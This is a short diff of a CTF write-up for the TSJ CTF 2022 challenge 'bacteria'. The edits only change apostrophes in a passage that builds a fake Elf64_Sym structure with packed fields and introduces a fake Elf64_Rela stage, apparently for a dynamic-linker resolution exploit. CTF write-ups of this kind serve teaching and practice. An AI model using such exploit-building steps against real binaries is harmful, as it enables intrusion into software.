project-sekai-ctf/sekai.team/data/blog/tsjctf-2022/bacteria.md

 st_shndx = p16(0)
 st_value = p64(0)
 # st_size is null already because the stack now contain all null byte
-# so we don't need to write these variable, just need to pad full 0x10
+# so we don’t need to write these variable, just need to pad full 0x10
-# bytes so that we don't need to sleep()
+# bytes so that we don’t need to sleep()
 Elf64_Sym_struct = st_name + st_info + st_other + st_shndx
 ```

-Because we haven't build up structure for STRTAB so st_name will be `0xdeadbeef`, just temporary and will change when STRTAB is finished.
+Because we haven’t build up structure for STRTAB so st_name will be `0xdeadbeef`, just temporary and will change when STRTAB is finished.
 Now we will leave it here and continue with the second struct: Elf64_Rela!

 ### Stage 3: Fake address and structure of Elf64_Rela